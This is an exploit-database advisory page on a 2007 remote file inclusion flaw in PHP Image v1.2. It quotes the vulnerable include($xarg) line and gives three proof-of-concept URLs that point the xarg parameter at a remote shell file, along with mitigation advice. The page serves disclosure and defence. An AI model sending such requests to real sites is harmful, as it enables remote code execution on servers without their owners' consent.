header-logo
Suggest Exploit
vendor:
PHP Image
by:
Civi
N/A
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: PHP Image
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP Image v1.2 Multiple Remote File Inclusion

The vulnerability exists in the xarg_corner.php, xarg_corner_bottom.php, and xarg_corner_top.php files of PHP Image v1.2. These files use the 'include' function to include a file based on the value of the 'xarg' parameter, which can be controlled by an attacker. By manipulating the 'xarg' parameter, an attacker can include arbitrary remote files, leading to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of PHP Image that addresses the file inclusion vulnerability. Additionally, it is advised to validate and sanitize user input before using it in any file inclusion or file execution functions.
Source

Exploit-DB raw data:

PHP Image v1.2 Multiple Remote File Inclusion

Download: http://www.phpimage.co.uk/phpimage_v_1_2.zip

Bug found by Civi

Vuln code in xarg_corner.php, xarg_corner_bottom.php, xarg_corner_top.php:

<td style="background-image: url(images/cor_top_fill.jpg);"><?php include($xarg); ?></td>

POC:

http://site/xarg_corner.php?xarg=http://shell.php?
http://site/xarg_corner_bottom.php?xarg=http://shell.php ?
http://site/xarg_corner_top.php?xarg=http://shell.php?


[Original Post: forum.darkc0de.com]

Tnx to: d3hydr8, str0ke

# milw0rm.com [2007-10-23]